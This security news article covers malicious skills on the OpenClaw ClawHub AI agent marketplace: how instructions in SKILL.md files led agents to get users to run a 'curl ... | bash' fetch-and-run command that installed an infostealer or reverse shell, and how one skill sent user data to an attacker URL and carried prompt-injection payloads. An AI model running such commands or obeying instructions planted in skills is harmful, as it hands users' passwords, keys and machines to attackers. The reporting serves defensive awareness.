OpenClaw’s Top Skill Revealed as Malware, Exposes Major Security Flaw in AI Marketplace

OpenClaw’s Top Skill Exposed as Malware: A Deep Dive into the ClawHub Security Breach

In a startling revelation, the most downloaded skill on OpenClaw’s ClawHub marketplace has been identified as functional malware, underscoring a significant supply chain vulnerability within the AI agent ecosystem.

OpenClaw and ClawHub: An Overview

OpenClaw is an open-source AI agent platform that allows users to enhance their agents’ capabilities through plugins, known as skills, available on its public marketplace, ClawHub. These skills are developed and published by third-party contributors, aiming to provide a wide range of functionalities to the OpenClaw community.

The Discovery of Malicious Skills

Security researcher @chiefofautism recently uncovered 1,184 malicious skills on ClawHub, with a single threat actor responsible for uploading 677 of these packages. This discovery highlights a critical security lapse, as ClawHub’s verification process required only a GitHub account older than one week for publishing rights. Attackers exploited this minimal barrier to flood the marketplace with malicious skills disguised as legitimate tools, such as cryptocurrency trading bots, YouTube summarizers, and wallet trackers, all accompanied by professionally crafted documentation to appear credible.

Mechanism of the Attack

The malicious instructions were embedded within the `SKILL.md` files of these packages. These instructions were designed to manipulate the AI agent into advising users to execute harmful commands. For instance, users were prompted to run commands like:

“`
curl -sL malware_link | bash
“`

On macOS systems, executing this command deployed Atomic Stealer (AMOS), an infostealer capable of extracting browser passwords, SSH keys, Telegram sessions, cryptocurrency wallet keys, keychain data, and API keys stored in `.env` files. On other operating systems, the malware established a reverse shell, granting attackers full remote control over the compromised machines.

Case Study: What Would Elon Do? Skill

Cisco’s AI Defense team conducted a security scan on ClawHub’s top-ranked community skill, titled What Would Elon Do? The scan revealed nine security vulnerabilities: two critical, five high, and two medium. This skill clandestinely exfiltrated user data by executing a `curl` command to an attacker-controlled server (`https://clawbub-skill.com/log`), with output redirected to `/dev/null` to evade detection. Additionally, it incorporated prompt injection payloads to circumvent safety guidelines, all while being downloaded thousands of times.

Historical Context and Previous Audits

This security crisis did not emerge suddenly. Koi Security had previously audited 2,857 ClawHub skills, identifying 341 malicious entries—nearly 12% of the entire registry. Of these, 335 were linked to a coordinated campaign named ClawHavoc. Similarly, Snyk’s audit uncovered 341 malicious skills, with a single publisher, hightower6eu, responsible for over 314 malicious packages, accumulating nearly 7,000 downloads. All identified malicious skills were connected to a common command-and-control server at `91.92.242.30`.

OpenClaw’s Response and Security Measures

In response to these findings, OpenClaw has partnered with Google’s VirusTotal to enhance the security of its marketplace. All uploaded skills are now subjected to automatic scanning, categorizing them as benign, suspicious, or malicious. Daily re-scans are conducted to detect any skills that may become malicious post-approval. This proactive approach aims to fortify the platform against similar supply chain attacks in the future.

Implications for the AI Agent Ecosystem

This incident serves as a stark reminder of the vulnerabilities inherent in AI agent platforms. Unlike traditional software, malicious packages in AI agents operate with broad system permissions, file access, and the ability to autonomously execute terminal commands. The attack surface extends beyond binary payloads, encompassing natural language instructions that traditional endpoint detection tools may not effectively parse or flag.

Recommendations for Users and Organizations

Organizations utilizing OpenClaw in enterprise environments should be aware of the compounded Shadow AI risk, where agent-executed actions leave minimal audit trails and can bypass conventional monitoring systems. It is imperative to implement stringent security measures, including thorough vetting of third-party skills, continuous monitoring of agent activities, and regular security audits to mitigate potential threats.

Conclusion

The exposure of malicious skills within OpenClaw’s ClawHub marketplace underscores the critical need for robust security protocols in AI agent platforms. As the AI ecosystem continues to evolve, ensuring the integrity and security of its components remains paramount to protect users and organizations from emerging cyber threats.